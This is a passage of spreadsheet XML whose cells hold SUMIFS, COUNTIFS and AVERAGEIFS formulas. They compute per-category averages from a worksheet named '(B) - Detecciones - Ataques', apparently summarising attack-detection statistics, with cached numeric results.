        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
)
</f>
        <v>2020.285714</v>
      </c>
      <c r="Y135" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GH$3:$GH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GH$3:$GH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
)
</f>
        <v>2.2</v>
      </c>
      <c r="Z135" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GH$3:$GH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GH$3:$GH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
)
</f>
        <v>7295.24829</v>
      </c>
      <c r="AA135" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GH$3:$GH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GH$3:$GH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
)
</f>
        <v>6.370481551</v>
      </c>
      <c r="AB135" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GH$3:$GH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GH$3:$GH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
)
</f>
        <v>9.319444444</v>
      </c>
      <c r="AC135" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GH$3:$GH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GH$3:$GH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
)
</f>
        <v>4.4</v>
      </c>
      <c r="AD135" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GH$3:$GH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GH$3:$GH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
)
</f>
        <v>1.965575877</v>
      </c>
      <c r="AE135" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GH$3:$GH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GH$3:$GH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
)
</f>
        <v>4.7</v>
      </c>
      <c r="AF135" s="502">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GH$3:$GH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GH$3:$GH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
)
</f>
        <v>1.601414141</v>
      </c>
      <c r="AG135" s="271"/>
      <c r="AH135" s="352" t="s">
        <v>2554</v>
      </c>
      <c r="AI135" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GH$3:$GH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>0.4161937298</v>
      </c>
      <c r="AJ135" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GH$3:$GH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>1</v>
      </c>
      <c r="AK135" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GH$3:$GH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AK$131)
</f>
        <v>6.5</v>
      </c>
      <c r="AL135" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GH$3:$GH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AL$131)
</f>
        <v>1</v>
      </c>
      <c r="AM135" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GH$3:$GH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AM$131)
</f>
        <v>0.9998561358</v>
      </c>
      <c r="AN135" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO135" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP135" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ135" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GH$3:$GH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>0.5802255639</v>
      </c>
      <c r="AR135" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GH$3:$GH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>0.8333333333</v>
      </c>
      <c r="AS135" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT135" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GH$3:$GH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>2</v>
      </c>
      <c r="AU135" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GH$3:$GH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>10.5</v>
      </c>
      <c r="AV135" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GH$3:$GH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>1.666666667</v>
      </c>
      <c r="AW135" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AX135" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GH$3:$GH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>1.555555556</v>
      </c>
      <c r="AY135" s="534" t="s">
        <v>12</v>
      </c>
      <c r="AZ135" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GH$3:$GH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>2.5</v>
      </c>
      <c r="BA135" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GH$3:$GH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>2</v>
      </c>
      <c r="BB135" s="534" t="s">
        <v>12</v>
      </c>
      <c r="BC135" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GH$3:$GH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>4711.333333</v>
      </c>
      <c r="BD135" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BE135" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GH$3:$GH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>3</v>
      </c>
      <c r="BF135" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GH$3:$GH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>2</v>
      </c>
      <c r="BG135" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GH$3:$GH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>1</v>
      </c>
      <c r="BH135" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GH$3:$GH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>1</v>
      </c>
      <c r="BI135" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BJ135" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BK135" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BL135" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GH$3:$GH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>2</v>
      </c>
      <c r="BM135" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GH$3:$GH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>1907.459668</v>
      </c>
      <c r="BN135" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GH$3:$GH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>14941.6401</v>
      </c>
      <c r="BO135" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BP135" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BQ135" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GH$3:$GH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>1.3</v>
      </c>
      <c r="BR135" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BS135" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GH$3:$GH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
        <v>3</v>
      </c>
      <c r="BT135" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BU135" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BV135" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GH$3:$GH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>1</v>
      </c>
      <c r="BW135" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GH$3:$GH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>5</v>
      </c>
      <c r="BX135" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BY135" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GH$3:$GH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>26.5</v>
      </c>
      <c r="BZ135" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GH$3:$GH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>1.016260163</v>
      </c>
      <c r="CA135" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CB135" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CC135" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CD135" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CE135" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CF135" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GH$3:$GH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>2</v>
      </c>
      <c r="CG135" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CH135" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GH$3:$GH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>9</v>
      </c>
      <c r="CI135" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GH$3:$GH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>23</v>
      </c>
      <c r="CJ135" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CK135" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GH$3:$GH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>7</v>
      </c>
      <c r="CL135" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CM135" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GH$3:$GH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>15.5</v>
      </c>
      <c r="CN135" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GH$3:$GH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>1</v>
      </c>
      <c r="CO135" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GH$3:$GH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>1.75</v>
      </c>
      <c r="CP135" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GH$3:$GH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>13.5</v>
      </c>
      <c r="CQ135" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GH$3:$GH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>4</v>
      </c>
      <c r="CR135" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CS135" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GH$3:$GH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CS$131)
</f>
        <v>0.4089496721</v>
      </c>
      <c r="CT135" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GH$3:$GH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0.00998003992</v>
      </c>
      <c r="CU135" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CV135" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GH$3:$GH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>7</v>
      </c>
      <c r="CW135" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CX135" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GH$3:$GH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>2</v>
      </c>
      <c r="CY135" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GH$3:$GH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>2</v>
      </c>
      <c r="CZ135" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DA135" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DB135" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DC135" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DD135" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DE135" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DF135" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DG135" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DH135" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GH$3:$GH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>1.951111111</v>
      </c>
      <c r="DI135" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DJ135" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GH$3:$GH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DJ$131)
</f>
        <v>1.454545455</v>
      </c>
      <c r="DK135" s="271"/>
    </row>
    <row r="136">
      <c r="J136" s="277"/>
      <c r="K136" s="512"/>
      <c r="L136" s="512"/>
      <c r="M136" s="512"/>
      <c r="N136" s="512"/>
      <c r="O136" s="278"/>
      <c r="Q136" s="271"/>
      <c r="R136" s="386" t="s">
        <v>2555</v>
      </c>
      <c r="S136" s="536">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BN$3:$BN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BN$3:$BN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
)
</f>
        <v>0.1666666667</v>
      </c>
      <c r="T136" s="536">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BN$3:$BN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BN$3:$BN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="U136" s="536">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BN$3:$BN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BN$3:$BN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
)
</f>
        <v>0.001315789474</v>
      </c>
      <c r="V136" s="536">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BN$3:$BN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BN$3:$BN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="W136" s="537">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BN$3:$BN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BN$3:$BN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="X136" s="536">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BN$3:$BN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BN$3:$BN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="Y136" s="536">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BN$3:$BN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BN$3:$BN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="Z136" s="536">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BN$3:$BN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BN$3:$BN$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
) / (
    COUNTIFS(
